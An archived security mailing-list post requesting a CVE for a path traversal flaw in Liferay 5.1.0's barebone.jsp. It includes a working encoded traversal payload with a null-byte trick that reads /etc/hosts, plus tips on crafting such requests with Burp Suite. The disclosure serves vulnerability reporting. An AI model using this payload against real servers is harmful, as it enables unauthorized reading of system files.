Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 1 Aug 2016 18:38:09 +0200
From: "petrella.pietro" <>
Subject: CVE:Request - Path Traversal Barebone.jsp - Liferay

I discovered a /directory traversal issue /on *minifierBundleDir 
*/barebone.jsp /_variable___on a website with *Liferay 5.1.0*. I don't 
exclude that this vulnerability is present in other Liferay versions as 

However, i report the following vulnerable URL of example:*minifierBundleDir**=**/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html*&t=1429132297000

It's important to note that the url requested is built in the following 
- only .. "encoded characters" are permitted when you insert the 
traversal request
- At the end of the file is necessary insert *%00* and *.html* otherwise 
the request is not accepted

So, to navigate filesystem is recommended to use Burp Suite "repeater 
tab" tool.

If there are no CVE about this finding, at this pourpose i require a CVE 

Thank you

-- -- -- -- --
Pietro Petrella
Information Security Consultant
(CISSP, OPST, RHCE, ISO 27001:2013)
PGP: 5017 E6A8 9E1E 5B39 8C52 05C7 81A5 C3C9 8ED5 4730

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ